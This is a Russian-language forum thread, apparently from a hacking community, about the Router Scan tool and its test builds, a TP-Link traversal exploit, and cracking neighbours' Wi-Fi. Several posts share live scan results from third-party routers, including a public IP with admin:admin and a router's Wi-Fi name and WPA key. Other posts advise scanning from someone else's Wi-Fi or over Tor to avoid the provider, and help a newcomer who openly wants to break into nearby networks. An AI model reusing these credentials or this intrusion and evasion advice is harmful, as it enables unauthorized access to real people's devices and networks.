зайдите на http://ipinfo.io, вбейте в поиск (правый верхний угол) ваш айпишнки ( в данном случае 62.33.169.1 ) и вам выдадут много адресов данного провайдера. зачастую даже можно получить зарезервированные айпиадреса ( банками, гос структурами и протчая)

п.с. а если нажать кнопочку внизу - то получить и некоторые данные сети

https://www.robtex.com/ip-lookup/62.33.169.230

sany22
24.03.2017, 18:23
Спасибо за советы-буду продолжать пробовать

binarymaster
24.03.2017, 23:04
Realtek Boa (QTECH QBR-1041WUv2S)






Airocon Virtual Web Router






Хотя при более глубоком рассмотрении, есть скрытая опция "tr id="show_password"

если её включить то результат: "2WEYRT3W" .



Исправил.

qwerty_332
25.03.2017, 14:27
Нашел тут некоторую информацию по поводу тп-линков. Это можно как-то реализовать?

https://www.cvedetails.com/cve/CVE-2015-3035/

http://www.securityfocus.com/archive/1/archive/1/535240/100/0/threaded

P.S. и список роутеров который подпадает под эту уязвимость довольно неплохой.

P.P.S Может пригодится.

https://www.coresecurity.com/advisories/tp-link-tddp-multiple-vulnerabilities

binarymaster
25.03.2017, 15:13
Нашел тут некоторую информацию по поводу тп-линков. Это можно как-то реализовать?

https://www.cvedetails.com/cve/CVE-2015-3035/

http://www.securityfocus.com/archive/1/archive/1/535240/100/0/threaded



Обновил существующий эксплойт TP-Link Traversal, теперь ещё больше устройств берёт.

Mednik
25.03.2017, 15:50
Обновил существующий эксплойт TP-Link Traversal, теперь ещё больше устройств берёт.


Может по тестируем свеженькую а то как то скучно становится , думаю не только мне.

binarymaster
25.03.2017, 15:59
Может по тестируем свеженькую а то как то скучно становится , думаю не только мне.


Почему бы и нет. Правда я ещё не все заявки по добавлению обработал, но тоже думаю, пора потестировать.

http://rgho.st/86J8SvWcR

P.S. для тех у кого не работает ссылка - пользуемся VPN / friGate

Osama2012
25.03.2017, 17:13
Почему бы и нет. Правда я ещё не все заявки по добавлению обработал, но тоже думаю, пора потестировать.

http://rgho.st/86J8SvWcR

P.S. для тех у кого не работает ссылка - пользуемся VPN / friGate


Что то башка вообще не соображает, в упор не вижу пасс на архив, ткните пальцем пожалуйста.

З.Ы. Не сочтите за наглость, вторые сутки на дежурстве, крыша уже едет.

binarymaster
25.03.2017, 18:10
в упор не вижу пасс на архив



В этом нет ничего удивительного, он там нигде не написан.



З.Ы. Не сочтите за наглость, вторые сутки на дежурстве, крыша уже едет.



Пароль стандартный, который всегда использовался для ночных сборок.



Это линукс ?



Читайте название темы и сообщения на предыдущей странице до полного просветления.

Если это не поможет, читайте все страницы темы от начала.

binarymaster
25.03.2017, 20:50
Значит я не в курсе какой пасс использовался для ночных сборок



Это не освобождает от ответственности не лишает возможности пользоваться поиском по теме.

Первое правило Бойцовского клуба: никому не рассказывать о Бойцовском клубе. У нас в сообществе с паролями также.

qwerty_332
26.03.2017, 13:31
Обновил существующий эксплойт TP-Link Traversal, теперь ещё больше устройств берёт.

Почему бы и нет. Правда я ещё не все заявки по добавлению обработал, но тоже думаю, пора потестировать.

http://rgho.st/86J8SvWcR

P.S. для тех у кого не работает ссылка - пользуемся VPN / friGate



Спасибо! Уже находит чуть больше точек из известной мне сети.

a.forregs
28.03.2017, 00:12
Если что-то изменится, об этом можно будет в первых рядах узнать здесь, в этой теме.

Всякое возможно. Я, как правило, выкладываю все поделки на свой сайт, а также открытые проекты на GitHub.



может пора закончить с самолюбованием, и выложить сорцы? тема протухает, для вас профит сомнителен, че еще нужно для глобализации? или вы считаете что вы программер намбер 1? скажу больше, не могу понять столь глобальной популярности этой поделки среди современной молодежи. списываю на полную и безвозвратную деградацию. но вы ведь все тут тусите, интересно к чему придете...

binarymaster
28.03.2017, 01:53
тема протухает



Неужели?



не могу понять столь глобальной популярности этой поделки среди современной молодежи



Относительная простота использования и хорошая автоматизация.



может пора закончить с самолюбованием, и выложить сорцы?



Есть такие вещи, рецепт изготовления которых лучше не выкладывать, в целях безопасности себя, окружающих, и мира во всём мире.



вы считаете что вы программер намбер 1?



Сейчас над проектом работает несколько человек в команде, каждый по мере своих возможностей.



но вы ведь все тут тусите, интересно к чему придете...



К успеху.

atlas28
28.03.2017, 02:06
может пора закончить с самолюбованием, и выложить сорцы? тема протухает, для вас профит сомнителен, че еще нужно для глобализации? или вы считаете что вы программер намбер 1? скажу больше, не могу понять столь глобальной популярности этой поделки среди современной молодежи. списываю на полную и безвозвратную деградацию. но вы ведь все тут тусите, интересно к чему придете...



А вы, господин, не подумали, что если эти исходники окажутся в открытом доступе, то рано или поздно какой-нибудь умник обязательно переделает роутерскан во вредоносную тулзу? При этом у данного школьника с нуля ее написать не хватит ума или как минимум терпения, а тут уже все для этого готово. И во всех этих роутерах начнут массово меняться днс в целях какого-нибудь материального профита и т. п. (это еще в лучшем случае), в общем, начнется хаос.

fffsfs
28.03.2017, 08:38
Неужели?

Относительная простота использования и хорошая автоматизация.

Есть такие вещи, рецепт изготовления которых лучше не выкладывать, в целях безопасности себя, окружающих, и мира во всём мире.

Сейчас над проектом работает несколько человек в команде, каждый по мере своих возможностей.

К успеху.


Здравствуйте,будет ли противник androdumpper или wps wpa tester?Что бы по базе wps можно было бы подключиться?

binarymaster
28.03.2017, 11:16
Здравствуйте,будет ли противник androdumpper или wps wpa tester?Что бы по базе wps можно было бы подключиться?



Какой такой противник? У нас нет конкурентов, у нас есть взаимодополнение.

И да, я не пишу ПО на Android, пока что.

Spoiler: Если в Npcap прикрутят инъекцию 802.11 пакетов в эфир, может быть в Router Scan появится что-то для работы с окружающими сетями.

Mednik
28.03.2017, 14:06
Был ли ,в справке к RS не нашел TOTOLINK-F1-V2.0.0-B20150721.1711

117.0.193.15:80, admin:admin .

asdfg2512
28.03.2017, 15:30
Вопрос для тех кто с Украины. Никто не делил для себе диапазоны Укрелекома по областях? Я в курсе, что диапазон динамический и может меняться по всей стране. Но в основном по региону меняются только последние 2 цифры

binarymaster
28.03.2017, 15:38
Был ли ,в справке к RS не нашел TOTOLINK-F1-V2.0.0-B20150721.1711

117.0.193.15:80, admin:admin .



У вас парсится? У меня нет. Думаю поэтому и в справке его нет, не поддерживается ещё.

binarymaster
28.03.2017, 15:43
Вопрос для тех кто с Украины. Никто не делил для себе диапазоны Укрелекома по областях? Я в курсе, что диапазон динамический и может меняться по всей стране. Но в основном по региону меняются только последние 2 цифры



Возможно вам пригодится:

https://forum.antichat.ru/posts/3806374

tigos1
29.03.2017, 04:02
Не воспримите это в негатив, просто решил спросить: а выложенный свежак - точно новее предыдущих? )

binarymaster
29.03.2017, 11:21
Не воспримите это в негатив, просто решил спросить: а выложенный свежак - точно новее предыдущих? )



Точно. Можете посмотреть в PE заголовках дату сборки.

sha9
29.03.2017, 13:35
хоть спешу,но не смог пройти мимо.



может пора закончить с самолюбованием



судя по вашему посту, излишним самомнением страдаете больше вы. такой тон вашего поста, будто вы корифей програмирования и спроектировали в одиночку, как минимум программу запуска баллистических ракет с удаленным управлением, попутно с программой контроля систем анб.



и выложить сорцы?



а зачаем? если вы такой гуру - спроектируйте сами нечто более серьезное. создайте приватный софт и удивите всех.



тема протухает



судя по количеству сообщений - очень даже актуальная тема. и народа все больше добавляется



или вы считаете что вы программер намбер 1?



а вы зарезирвировали это место для себя?



скажу больше, не могу понять столь глобальной популярности этой поделки среди современной молодежи. списываю на полную и безвозвратную деградацию.



а что, пардон, вы тут в таком случае забыли, зачем пришли в тему, да еще и сорцы этой "поделки" вам понадобились? тут на что списывать будете?



но вы ведь все тут тусите, интересно к чему придете...



ну если мы все тут одни деградированные личности, то зачем такой интерес к этой "тусовке" и тому, до чего дойдем? с высоты вашего полета наша мышинная возня вообще должна быть ниже вашего достоинства. а тем более общаться с нами ничтожными личностями.ваше место как минимум на закрытых элитных хакерских форумах, да еще на уровне как минимум модератора.

binarymaster
29.03.2017, 13:48
хоть спешу,но не смог пройти мимо.



Это же был просто очередной провокационный пост, не стоит уделять подобному много эмоций.

sha9
29.03.2017, 14:00
Это же был просто очередной провокационный пост, не стоит уделять подобному много эмоций.


не согласен. на мой взгляд - стоит. если к вам пришли в гости и с порога, ни здрасти, ни до свидания, а сразу назвали, ну скажем долб-м - как поступить с таким человеком? тоже не уделять внимание?

Alex19845
29.03.2017, 20:48
к вам пришли в гости и с порога, ни здрасти, ни до свидания, а сразу назвали, ну скажем долб-м



в реале такой гость улетел бы ещё не дойдя до порога. но тут форум, на котором тот провокатор формально правил не нарушал оставив свою не приятную срань тут, пост его удалить нельзя.



как поступить с таким человеком?



Да, не приятно. Согласен абсолютно. Но реально - просто игнорить как будто его и не было, о нём забудут все тут же. Если его провоцировать на действия, и уделять ему много внимания которое он сильно хочет, то срачь может не заканчиваться ещё очень долго. Показушность и выпендрёж нужен лично ему, но не нам. Поэтому для нас оно просто мусор.

Игнор в данном случае - это наиболее лучший вариант как бы сильно не хотелось другого.

Akmal
30.03.2017, 14:39
Скачал эту прогу недавно. Возникли проблемы. А именно не выводит хороших результатов, просто айпи адреса, порты и время. А девайс/имя сервера и т.д пишет Unknown. В чём можеть проблема? Может нужно указать другие айпи дистанции в настройках? ПК - windows XP, есть внешний USB-беспроводной адаптер. Я если что новичок не судите строго

binarymaster
30.03.2017, 15:28
не выводит хороших результатов, просто айпи адреса, порты и время. А девайс/имя сервера и т.д пишет Unknown.



Таких строчек много? Пришлите скриншот.

Kakoluk
30.03.2017, 16:06
Скачал эту прогу недавно. Возникли проблемы. А именно не выводит хороших результатов, просто айпи адреса, порты и время. А девайс/имя сервера и т.д пишет Unknown. В чём можеть проблема? Может нужно указать другие айпи дистанции в настройках? ПК - windows XP, есть внешний USB-беспроводной адаптер. Я если что новичок не судите строго


Основные(попсовые) порты:

80

8080

443

161

Количество потоков выбирать вам, но примерно 70 - для вас судя по всему, будет оптимально(если хотите комфортно при этом сидеть в интернете).

Диапазоны выбирать вам, зайдите например сюда http://ip.posle.info

По дефолту покажет диапазон вашего текущего провайдера, если укажете в строке(вверху)

- покажет принадлежность к диапазону и провайдера(иногда, с точностью до области).

Если хотите помочь просканнировать другие диапазоны - велкам http://3wifi.stascorp.com/ .

..

И если у вас XP, рекомендую проверить ограничение на количество "полуоткрытых" соединений(ставьте смело 500).

Есть тулза для этого: https://yadi.sk/d/c68j7UOr3GVC6K

Akmal
30.03.2017, 16:47
Таких строчек много? Пришлите скриншот.



http://s01.geekpic.net/di-X3VRGL.jpeg

Akmal
30.03.2017, 16:49
Если что-то не так укажите плс

binarymaster
30.03.2017, 16:53
Если что-то не так укажите плс



http://image.prntscr.com/image/2a552e64051f43fc81a814f35ba5cbd8.png

Akmal
30.03.2017, 17:01
USB Disk Security

Akmal
30.03.2017, 17:01
Разве это Брандмауэр?

binarymaster
30.03.2017, 17:13
USB Disk Security






Разве это Брандмауэр?



Вряд ли, но всякое возможно. Чисто по строкам в Router Scan создаётся ощущение, что симулируются открытые порты какой-то программой, типа антивируса или брандмауэра.

Ещё смущает, что у вас на скриншоте все сетевые интерфейсы отключены (хотя может включённые не отображаются, но сомневаюсь).

Akmal
30.03.2017, 17:21
Сетевые интерфейсы? В смысле прога, которая обеспечивает соединение с интернетом? А так может дело в местоположении, всё-таки я живу не в России или Украине, а гораздо дальше Сижу я кстати с usb-модема

Akmal
30.03.2017, 17:26
Основные(попсовые) порты:

80

8080

443

161

Количество потоков выбирать вам, но примерно 70 - для вас судя по всему, будет оптимально(если хотите комфортно при этом сидеть в интернете).

Диапазоны выбирать вам, зайдите например сюда http://ip.posle.info

По дефолту покажет диапазон вашего текущего провайдера, если укажете в строке(вверху)

- покажет принадлежность к диапазону и провайдера(иногда, с точностью до области).

Если хотите помочь просканнировать другие диапазоны - велкам http://3wifi.stascorp.com/ .

..

И если у вас XP, рекомендую проверить ограничение на количество "полуоткрытых" соединений(ставьте смело 500).

Есть тулза для этого: https://yadi.sk/d/c68j7UOr3GVC6K



Поток, как я понимаю это Max.threads?

binarymaster
30.03.2017, 17:35
Сетевые интерфейсы?



http://image.prntscr.com/image/59613ba0fbb1452a9d1e5bf663c46db3.png

Все отключены, включённых не вижу.



Поток, как я понимаю это Max.threads?



Да, это их верхнее возможное значение.

Akmal
30.03.2017, 17:37
http://image.prntscr.com/image/59613ba0fbb1452a9d1e5bf663c46db3.png

Все отключены, включённых не вижу.

Да, это их верхнее возможное значение.



Справа от последних двух стрелок есть изображение с буквой 'u' - эта прога обеспечивает инет, и да как я уже говорил сижу я с USB-модема

binarymaster
30.03.2017, 17:43
Справа от последних двух стрелок есть изображение с буквой 'u' - эта прога обеспечивает инет, и да как я уже говорил сижу я с USB-модема



А, понятно. Не могу утверждать точно, но проблема может быть связана именно с этим - нестандартный способ выхода в сеть.

Вы так и не ответили, установлены ли у вас какие-либо антивирусы или брандмауэры. По скриншоту - не очевидно.

Akmal
30.03.2017, 17:46
Нет, антивирусов нет. Стандартный брандмауэр (который с панели управления) отключён. Нестандартный способ? А если я подключусь через беспроводную сеть?

binarymaster
30.03.2017, 17:48
А если я подключусь через беспроводную сеть?



Попробуйте.

Akmal
30.03.2017, 18:00
Попробовал, но тоже самое( Видимо прога не поддерживает эти провайдеры или сами роутеры. Просто я заинтересован ко взлому этих точек ;D Видимо не судьба. А знаете вы какие-нибудь другие программы для взлома wifi-сетей. Просто я уже всё перепробовал ничего не выходило, увы

binarymaster
30.03.2017, 18:10
Попробовал, но тоже самое( Видимо прога не поддерживает эти провайдеры или сами роутеры.



Сомневаюсь, что это вообще роутеры, потому что все IP адресы и все порты отвечают.

Попробуйте включить отладочный дамп, и посмотреть, что в нём будет (на примере узла 192.168.8.1).

Akmal
30.03.2017, 18:16
Отладочный дамп? В смысле? Это в программе такая функция?

III4664T
30.03.2017, 18:34
Попробовал, но тоже самое( Видимо прога не поддерживает эти провайдеры или сами роутеры. Просто я заинтересован ко взлому этих точек ;D Видимо не судьба. А знаете вы какие-нибудь другие программы для взлома wifi-сетей. Просто я уже всё перепробовал ничего не выходило, увы


Ты выходишь в сеть через сотового оператора? Как мне кажется это Ucell, по логотипу иконки... Какая у них локальная сеть и ее настройки, ХЕР их знает. Хочешь сканить, подключайся к интертнет провайдеру дающего доступ к сети посредством ADLS или FTTP, то что есть в твоем регионе и будет тебе счастье.

binarymaster
30.03.2017, 18:38
Отладочный дамп? В смысле? Это в программе такая функция?



Да, документацию читайте, там это и вообще всё есть.

Akmal
30.03.2017, 19:13
Ты выходишь в сеть через сотового оператора? Как мне кажется это Ucell, по логотипу иконки... Какая у них локальная сеть и ее настройки, ХЕР их знает. Хочешь сканить, подключайся к интертнет провайдеру дающего доступ к сети посредством ADLS или FTTP, то что есть в твоем регионе и будет тебе счастье.



Не думал, что кто-то кроме меня в стране будет заходить в этот сайт) Вот так неожиданность). Подключиться я к такому провайдеру пока не могу, ибо средства не позволяют. Ну у меня есть сосед с таким провайдером, если я подключусь через его вай-фай я смогу сканить нормально?

Akmal
30.03.2017, 19:17
Да, документацию читайте, там это и вообще всё есть.



А где находится документация?

Triton_Mgn
30.03.2017, 20:43
Дайте нам ip диапазон в личку, например binarymaster -у

Чтобы разобраться.

Triton_Mgn
30.03.2017, 20:44
А где находится документация?



В программе есть хелп, не?

Triton_Mgn
30.03.2017, 20:46
Не думал, что кто-то кроме меня в стране будет заходить в этот сайт) Вот так неожиданность). Подключиться я к такому провайдеру пока не могу, ибо средства не позволяют. Ну у меня есть сосед с таким провайдером, если я подключусь через его вай-фай я смогу сканить нормально?



Неизвестно пока вы не дадите в личку для проверки хотябы ip из диапазона.

binarymaster
30.03.2017, 21:16
Неизвестно пока вы не дадите в личку для проверки хотябы ip из диапазона.



Да по скриншоту видно, он сканировал диапазоны по умолчанию (локальные).



В программе есть хелп, не?



Действительно.

tigos1
31.03.2017, 00:42
Какой смысл сканировать IP для локальных сетей (192.168..) если единственный выход в хоть какую-то сеть - МОБИЛЬНЫЙ ИНТЕРНЕТ.

Вероятность что пров выдает клиентам адреса из стандартной группы - стремится к нулю, тем более если это не Россия и не Украина.

Автор посмотри что за адрес выдал тебе пров, и подправь его до ДИАПАЗОНОВ СКАНИРОВАНИЯ.

(Это - так, мысли в слух.. а вообще предположу что провайдер скорей всего ещё и закрывает внутри групп всех от всех)



http://s01.geekpic.net/di-X3VRGL.jpeg

Akmal
31.03.2017, 06:37
На днях попробую зайти через Беспроводную сеть соседского вай-фая. Там и укажу айпи соседа, да и вообще просканирую. Результат скину скрином. Спасибо всем

Akmal
31.03.2017, 08:49
Кстати хотел спросить в проге есть функция WPS PIN Companion попробовал эту функцию, указав mac адрес сети она выводит настоящий пин код роутера? А то попробовал через этот пин взломать соседский вай-фай не вышло. Да и вообще возможно ли взломать роутер Huawei?

Kakoluk
31.03.2017, 09:54
Кстати хотел спросить в проге есть функция WPS PIN Companion попробовал эту функцию, указав mac адрес сети она выводит настоящий пин код роутера? А то попробовал через этот пин взломать соседский вай-фай не вышло. Да и вообще возможно ли взломать роутер Huawei?



Ловите хендшейк, и сюда: https://forum.antichat.ru/threads/435763/

Akmal
31.03.2017, 13:38
Ловите хендшейк, и сюда: https://forum.antichat.ru/threads/435763/



Увы но все виды хендшейков, которые я знаю, не поддерживают мой адаптер

Kakoluk
31.03.2017, 14:38
Увы но все виды хендшейков, которые я знаю, не поддерживают мой адаптер


Что это значит?

- В смысле, ваш WiFi модуль не может быть переведён в режим монитора(и инъекции пакетов)?

Попробуйте запустить AirSlax(хотя бы Base), в этой сборке регулярно свежие драйверы WiFi подтаскивают.

Akmal
31.03.2017, 15:38
Что это значит?

- В смысле, ваш WiFi модуль не может быть переведён в режим монитора(и инъекции пакетов)?

Попробуйте запустить AirSlax(хотя бы Base), в этой сборке регулярно свежие драйверы WiFi подтаскивают.



Да нет, я хочу сказать что у меня неподдерживаемый wi-fi адаптер, это не ASUS, Realtek, NETGear или что-то в этом роде. Он у меня внешний USB. А такие проги, как Dumpper, WireShark, CommView Wifi и другие не видят его и не работают, соответственно у меня проблемы со взломом. Да и кстати у меня обычный ПК, а не ноутбук.

binarymaster
31.03.2017, 16:03
Да нет, я хочу сказать что у меня неподдерживаемый wi-fi адаптер, это не ASUS, Realtek, NETGear или что-то в этом роде. Он у меня внешний USB. А такие проги, как Dumpper, WireShark, CommView Wifi и другие не видят его и не работают, соответственно у меня проблемы со взломом. Да и кстати у меня обычный ПК, а не ноутбук.



Можно поподробнее, что за Wi-Fi адаптер экзотический такой?

Kakoluk
31.03.2017, 16:03
Да нет, я хочу сказать что у меня неподдерживаемый wi-fi адаптер, это не ASUS, Realtek, NETGear или что-то в этом роде. Он у меня внешний USB. А такие проги, как Dumpper, WireShark, CommView Wifi и другие не видят его и не работают, соответственно у меня проблемы со взломом. Да и кстати у меня обычный ПК, а не ноутбук.



Я имел ввиду линуксовую сборку для аудита, а не какую то конкретную программу.

Я не настаиваю.

Akmal
31.03.2017, 16:12
Можно поподробнее, что за Wi-Fi адаптер экзотический такой?


Пожалуйста, обычный дешевенький 802.11n USB Wireless LAN card http://s01.geekpic.net/di-ENH6S9.jpeg

Akmal
31.03.2017, 16:13
Я имел ввиду линуксовую сборку для аудита, а не какую то конкретную программу.

Я не настаиваю.



У меня нету ОС Linux

binarymaster
31.03.2017, 16:17
У меня нету ОС Linux



Сейчас нету - значит будет. Качаете, устанавливаете на флешку, и загружаетесь с неё.



Пожалуйста, обычный дешевенький 802.11n USB Wireless LAN card



Наверняка на него найдутся нормальные драйверы, с которыми начнут работать вышеперечисленные программы.

Akmal
31.03.2017, 17:02
Сейчас нету - значит будет. Качаете, устанавливаете на флешку, и загружаетесь с неё.



Я никогда не пользовался Linux. Точно всё будет в порядке? Да и вообще, подходит ли мой пк к нему?



Наверняка на него найдутся нормальные драйверы, с которыми начнут работать вышеперечисленные программы.



Ну не знаю, если таковы найдутся, я буду только рад.

Kakoluk
31.03.2017, 18:37
про игнор верно. это единственный вариант когда нечего сказать. я в чем то согласен с тем челом. если двоичник не тянет, то не грех сделать опенсорсом. а уж интриги с пасвордом, это и вовсе детский сад. согласен что контингент такой и есть, но и прогрессировать тоже нужно. а вы топчетесь в своей луже. напоминает свиней. сори за сравнение. Alex19845, ты настоящий диванный хако-вояка. так держать.



Надеюсь это всё дерьмо что в вас имеется. "Залягте на дно", ещё скажем .. года на 4.

binarymaster
31.03.2017, 21:53
Я никогда не пользовался Linux. Точно всё будет в порядке? Да и вообще, подходит ли мой пк к нему?



Всё познаётся на практике, главное не пасуйте, а идите вперёд. А мы направим.

binarymaster
31.03.2017, 22:34
А тем временем о программе уже пишут в таких известных пабликах ВК, как Типичный программист / сисадмин.

yx-ex
01.04.2017, 01:26
Наверняка на него найдутся нормальные драйверы, с которыми начнут работать вышеперечисленные программы.



С этим адаптером не так всё просто.А точнее-совсем всё просто.Просто есть один и тот же корпус с антенной,только вот чипы разные.Есть на Ралинках,а есть на Реалтеках 8188.Так вот подозреваю что человек себе приобрел адаптер не глядя на то какой там чип стоит,и взял с реалтеком,и спешу его огорчить-ему на этом адаптере вардрайвинг не светит.Взял бы на Ралинке-все дрова во всех сборках и виндах даже есть по умолчанию,а для его адаптера-увы,и драйвера ставить,и в линуксах и слаксах он не опознается,и самое страшное- режим мониторинга и пакетной иньекции на этом адаптере работать не будет.

Так что-вперед,заказывать новый адаптер на нужном чипе,на Али или Ибэе или еще где.

Akmal
01.04.2017, 06:09
С этим адаптером не так всё просто.А точнее-совсем всё просто.Просто есть один и тот же корпус с антенной,только вот чипы разные.Есть на Ралинках,а есть на Реалтеках 8188.Так вот подозреваю что человек себе приобрел адаптер не глядя на то какой там чип стоит,и взял с реалтеком,и спешу его огорчить-ему на этом адаптере вардрайвинг не светит.Взял бы на Ралинке-все дрова во всех сборках и виндах даже есть по умолчанию,а для его адаптера-увы,и драйвера ставить,и в линуксах и слаксах он не опознается,и самое страшное- режим мониторинга и пакетной иньекции на этом адаптере работать не будет.

Так что-вперед,заказывать новый адаптер на нужном чипе,на Али или Ибэе или еще где.



По сути да, но чип по-моему ралинковый, ибо мне дали микро-диск с драйвером, когда устанавливал драйвера, предлагали установить прогу Ralink Wireless Utility, оттуда можно подключаться к сетям, как и в обычном. Есть кнопка WPS.

Kakoluk
01.04.2017, 07:54
По сути да, но чип по-моему ралинковый, ибо мне дали микро-диск с драйвером, когда устанавливал драйвера, предлагали установить прогу Ralink Wireless Utility, оттуда можно подключаться к сетям, как и в обычном. Есть кнопка WPS.



Ну вы таки, пробовали грузить с флешки airslax, wifislax итд? Проверить то не сложно. А то получается, что воду в ступе толчём.

Страшного то ничего не случится.

Akmal
01.04.2017, 07:59
Ну вы таки, пробовали грузить с флешки airslax, wifislax итд? Проверить то не сложно. А то получается, что воду в ступе толчём.

Страшного то ничего не случится.


Эти проги ведь работают на ОС Linux? Хотел спросить, а может ли сеть быть защищена от взлома путём WPS?

Kakoluk
01.04.2017, 08:11
Эти проги ведь работают на ОС Linux? Хотел спросить, а может ли сеть быть защищена от взлома путём WPS?



Всё в личке.

yx-ex
01.04.2017, 12:16
По сути да, но чип по-моему ралинковый, ибо мне дали микро-диск с драйвером, когда устанавливал драйвера, предлагали установить прогу Ralink Wireless Utility, оттуда можно подключаться к сетям, как и в обычном. Есть кнопка WPS.



Если там все-таки Ралинк-то никакие драйвера вам не нужны.Виндоус,начиная с 7ки уже содержит драйвер для Ралинка,3 версии,но все-таки драйвер присутствует.И в сборках слаксов он определится и будет нормально работать.Что мы вокруг да около-посмотрите в диспетчере устройств,и определитесь-какой у вас адаптер,на каком чипе.

yx-ex
01.04.2017, 12:35
Эти проги ведь работают на ОС Linux? Хотел спросить, а может ли сеть быть защищена от взлома путём WPS?



Эти проги и есть Линукс.Прекращайте оффтопить не по теме обсуждения,и почитайте про сборки Airslax и Wifislax.О них достаточно много написано и обсуждено на этом форуме.А то этот ликбез с вопросами новичка не в той теме мешает обсуждению основного вопроса этой темы.Хотите учиться-начните учиться,там ничего сложного или опасного нет,главное желание понять и научиться,а вот его я пока у вас не вижу.

sha9
01.04.2017, 14:09
тестовая сборка действительно парсит больше роутеров. отдельный + за поддержку ряда айпикамер. единственное что осталось - не срабатывает на остановку в процессе сканирования. точнее срабатывает если останавливать в конце сканирования. это не напрягает. просто для информации.

Akmal
01.04.2017, 15:54
Если там все-таки Ралинк-то никакие драйвера вам не нужны.Виндоус,начиная с 7ки уже содержит драйвер для Ралинка,3 версии,но все-таки драйвер присутствует.И в сборках слаксов он определится и будет нормально работать.Что мы вокруг да около-посмотрите в диспетчере устройств,и определитесь-какой у вас адаптер,на каком чипе.



Гляньте сами http://s01.geekpic.net/di-C7EPRG.jpeg

Kakoluk
01.04.2017, 16:07
Гляньте сами



Кажись, самый что ни на есть, попсовый Ralink, подписанный Microsoft(стандартные проверенные дрова). Запускайте слаксы, и покончим на этом.

Akmal
01.04.2017, 17:00
Так и сделаем. Надеюсь завтра

aramaz
01.04.2017, 22:33
Добрый вечер!

При сканировании диапазона всегда мучил один момент. Провайдер как-то засекает это дело? Могут придти в гости вежливые люди?

Kakoluk
01.04.2017, 23:18
Добрый вечер!

При сканировании диапазона всегда мучил один момент. Провайдер как-то засекает это дело? Могут придти в гости вежливые люди?



Юридически, ответственность несёт лицо заключившее с провайдером договор. Я не думаю, что за вами придут пока вы не натворили чего то серьёзного.

Например, сильно ударили по финансовой системе(банки, гос-организации платёжные системы итд).

Есть старая пословица: Не трогай сильных мира сего, - они крепко бьют за это.

a.forregs
02.04.2017, 00:35
Юридически, ответственность несёт лицо заключившее с провайдером договор. Я не думаю, что за вами придут пока вы не натворили чего то серьёзного.

Например, сильно ударили по финансовой системе(банки, гос-организации платёжные системы итд).

Есть старая пословица: Не трогай сильных мира сего, - они крепко бьют за это.



да вы книжки видимо читали...

sha9
02.04.2017, 15:19
Добрый вечер!

При сканировании диапазона всегда мучил один момент. Провайдер как-то засекает это дело? Могут придти в гости вежливые люди?



теоретически - да. практически, при простом сканировании - вряд-ли. в день сканируют сети столько ботов, хацкеров и всех кому не лень, что ни провайдер, ни клиент ( даже банк) не обращают на это особого внимания. вот если начнете чудить ( подменять днс, пароли и т.п.), тогда могут прийти. если вы сканируете со своего дома. если с чужого вайфая - то придут к хозяину точки. кстати, на kali.tools описан кажется способ запускать трафик ( в том числе роутерскана) через сети тор.

sha9
02.04.2017, 15:24
Есть старая пословица: Не трогай сильных мира сего, - они крепко бьют за это.



трогать можно. но умеючи. кстати, как правило эти сильные мира и более уязвимы. уж больно самоуверены.

Payer
02.04.2017, 15:24
если вы сканируете со своего дома. если с чужого вайфая - то придут к хозяину точки.



У нас отключают интернет хозяину точки.

Потом надо ходить и доказывать, что устранил проблемы подозрительной активности.

sha9
02.04.2017, 15:27
У нас отключают интернет хозяину точки.

Потом надо ходить и доказывать, что устранил проблемы подозрительной активности.



ну это уже проблема хозяина точки главное вы в безопасности. если конечно точка не рядом с вашей квартирой. а если серьезно - то видимо провайдер не большой. крупные провайдеры , такие например, как телеком, мтс и т.п физически не могут уследить за всей "подозрительной" активностью.

underpol
03.04.2017, 10:35
admin:[email protected]:8080

109.62.0.70 8080 218 Done Unknown

BOX

Version du firmware : A50806-omt4-29688 - 2010-01-21

Version du code modem : 2.2.1.12.0.1 24/1 8:26

Adresse IP : 192.168.1.1

Adresse MAC : 00:0C:C3:4A:7E:8E

Démarré depuis : 475:28:29

Hose12
03.04.2017, 11:18
У нас отключают интернет хозяину точки.

Потом надо ходить и доказывать, что устранил проблемы подозрительной активности.



Я пользую роутер скан в 5 различных сетях города, ни один провайдер за это у нас не банит и вопросов не задают (пока).

А вот за устроенный мною по несознанке в интерцептере "сетевой шторм" провайдер меня блочил уже раза три, но всё решается звонком в поддержку и обещанием просканировать на вирусы комп, ага.

binarymaster
03.04.2017, 11:25
Я пользую роутер скан в 5 различных сетях города, ни один провайдер за это у нас не банит и вопросов не задают (пока).

А вот за устроенный мною по несознанке в интерцептере "сетевой шторм" провайдер меня блочил уже раза три, но всё решается звонком в поддержку и обещанием просканировать на вирусы комп, ага.



В общем-то логично, атака ARP Poison куда более опасна, чем простой скан портов (при условии, что железо провайдера может лишь определять такую активность, и предотвращать блокировкой).

binarymaster
03.04.2017, 17:44
95.71.124.52 80 47 Done superadmin:****** ZTE ZXDSL 931VII, hardware: 1.0.0, firmware: 2.0.00.RUSS [X] 00:00:00:00:00:00 Domolink_DML_P82143509 WPA2 atlthfwbz 192.168.1.1 255.255.255.0 95.71.124.52 255.255.255.255 1.0.0.1 82.151.97.50 82.151.98.162



Этот корректно отпарсился.

Kakoluk
03.04.2017, 17:49
Этот корректно отпарсился.



Кажется, пришёл исторический момент открыть свежую ветку программы с вашим топиком, ссылкой и доками.

И прикрепить её вверху.

binarymaster
03.04.2017, 17:51
Кажется, пришёл исторический момент открыть свежую ветку программы с вашим топиком, ссылкой и доками.

И прикрепить её вверху.


Ещё один тред про Router Scan? Только не это!

Лучше бы получить права на модерацию этой темы, и редактирование сообщений в ней.



а пароль от админки?



Неуязвим к получению пароля / фильтрация telnet.

Felis-Sapiens
05.04.2017, 14:50
Парни, может кто нибудь по этим слепкам, понять что за устройство?



Возможно QBR-2041WW или что-то аналогичное (см. 31.l62.60.52)

sha9
05.04.2017, 15:27
Парни, может кто нибудь по этим слепкам, понять что за устройство?

94.51.42.24



ИМХО скорее всего Linksys RV042 . или 043.

asdfg2512
05.04.2017, 21:51
какая тут локалка?10.50 или другая?https://img-host.org.ua/images/rkrrkr.jpg

линк на картинку https://img-host.org.ua/images/rkrrkr.jpg

binarymaster
05.04.2017, 22:04
какая тут локалка?10.50 или другая?

https://img-host.org.ua/images/rkrrkr.jpg



Да, 10.50.0.0/16

А внешние диапазоны все тут:

http://bgp.he.net/AS6849#_prefixes

Kakoluk
05.04.2017, 22:11
Да, 10.50.0.0/16



И вообще там всё интересно.

http://ip.posle.info/?ip=74.125.52.238

